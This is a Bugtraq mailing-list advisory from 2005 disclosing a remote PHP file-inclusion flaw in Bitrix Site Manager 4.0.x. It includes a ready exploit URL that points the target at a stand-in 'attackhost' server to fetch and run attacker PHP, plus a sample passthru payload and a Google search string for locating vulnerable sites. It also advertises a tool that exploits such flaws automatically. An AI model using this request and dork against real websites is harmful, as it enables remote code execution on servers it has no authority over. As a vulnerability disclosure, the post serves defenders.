Bugtraq mailing list archives
Vulnerability: Bitrix Php inclusion
From: D_BuG <d_bug () bk ru>
Date: Wed, 15 Jun 2005 17:58:11 +0400
Vendor: Bitrix Product: Bitrix Site Manager 4.0.x Vulnerability: php including. Consequence: custom php code execution on server Risk: Critical Description: Due to unfiltered _SERVER[DOCUMENT_ROOT] variable in file “\bitrix\modules\main\start.php”, hacker can upload php script from other server and execute custom php code on webserver Send transaction to the server. Script Example: <?php passthru('ls -la'); ?> Transaction should look like http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/ “attackhost” server should contain dbconn.php script in /bitrix/php_interface/ , that should be executet on the target server. Google search: inurl: /bitrix/ Discoveried By D_BuG d_bug () bk ru NemesisSecurityTeam http://nemesisoftware.com/ CheckZond free v. 1.0 http://nemesisoftware.com/products.htm uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage. -- Best regards, D_BuG mailto:d_bug () bk ru
Current thread:
- Vulnerability: Bitrix Php inclusion D_BuG (Jun 15)